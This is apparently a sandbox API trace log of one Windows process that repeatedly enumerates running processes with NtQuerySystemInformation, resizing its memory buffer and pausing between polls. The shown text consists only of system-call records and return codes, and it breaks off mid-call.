[0162.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.057] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.097] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.129] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.135] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.150] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.166] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.182] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.198] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.213] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.230] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.245] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.260] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.277] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.295] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.307] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.326] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.338] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.354] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.369] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.385] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.401] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 